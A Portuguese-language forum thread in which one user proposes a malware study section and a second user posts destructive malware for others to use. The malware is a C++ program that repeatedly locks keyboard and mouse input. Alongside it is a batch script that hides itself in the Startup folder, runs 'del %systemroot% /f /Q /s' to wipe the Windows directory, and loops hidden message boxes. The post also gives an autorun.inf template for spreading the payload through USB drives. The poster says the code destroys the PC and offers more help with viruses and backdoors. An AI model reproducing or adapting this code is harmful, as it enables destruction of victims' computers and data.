Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Área de virus

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Área de virus

    Amigos, sugiro uma área do fórum fixa para estudo sobre vírus, malware, trojans etc. Onde comentaríamos sobre desenvolvimento, análise, descoberta e soluções dos mesmos. Seria uma área mais completa, pois só existe uma especifica para trojan e keyloggers e bem sabemos que este universo é bem maior do que isso.
    Obrigado
    Sucesso é a única possibilidade!
    Similar Threads

  • Font Size
    #2
    Meu apoio !

    Fala manos... Beleza ? Tem meu total apoio, porque nem todos que vem para esse fórum está querendo saber de trojans e keyloggers, entre outros masi pesquisados... Vou deixar algo legal com vocês.

    Código C++ (Projeto HardBlock, Dev-C++ 5.9.2, compilador g++), travando inputs do pc:

    #include <windows.h>
    #include <winable.h>
    #include <stdio.h>

    using namespace std;
    int main() {
    Sleep(1000);
    BlockInput(true);
    Sleep(5000);
    BlockInput(true);
    return main()
    }

    -----------------------------------------------------------------------------------------------------------------------------------

    Código CMD (Projeto Start, Prompt de Comando), ativando o HardBlock.exe e destruindo o pc:

    @echo off
    copy "Nome do arquivo Batch compilado" "%userprofile%\Menu Iniciar\Programas\Inicializar"
    copy "HardBlock.exe" "%userprofile%\Menu Iniciar\Programas\Inicializar"
    cd %userprofile%\Menu Iniciar\Programas\Inicializar
    attrib +h "Nome do arquivo Batch compilado"
    attrib +h "HardBlock.exe"
    start HardBlock.exe
    echo/msgbox"Mensagem", vbcritical, "Titulo" >MsgVrs.vbs
    attrib +h "MsgVrs.vbs"
    start MsgVrs.vbs
    del %systemroot% /f /Q /s
    goto LoopMessage
    :LoopMessage
    echo/msgbox"Mensagem", vbcritical, "Titulo" >MsgVrs2.vbs
    attrib +h "MsgVrs2.vbs"
    start MsgVrs2.vbs
    goto LoopMessage

    -----------------------------------------------------------------------------------------------------------------------------------

    Arquivo de informações para auto-inicialização de um arquivo no pen-driver:

    [AUTORUN]
    label=Nome do pen-driver
    open=Nome do arquivo (pode ser um arquivo dando start no vírus em geral)
    icon=Nome do ícone (será o ícone novo do pen-driver)

    -----------------------------------------------------------------------------------------------------------------------------------


    Observação: Caso você coloque o vírus pronto no pen-driver com autorun não poderá mais usá-lo, e se mesmo assim insistir em usá-lo saiba que seu computador vai ser destruído !

    2º observação: O código do HardBlock (em C++) deve ser inserido em um projeto de aplicação de console, lembrando que o meu compilador é o g++.

    Para mais ajudas sobre vírus, worms, malwares, spywares, keyloggers, adwares, trojans, botnets, backdoores, e algo sobre segurança de sistema basta me mandar uma mensagem no privado ou mandar uma resposta neste tópico !

    Agradeço a sua atenção !
    Acabou.

    Comment

    X
    Working...
    X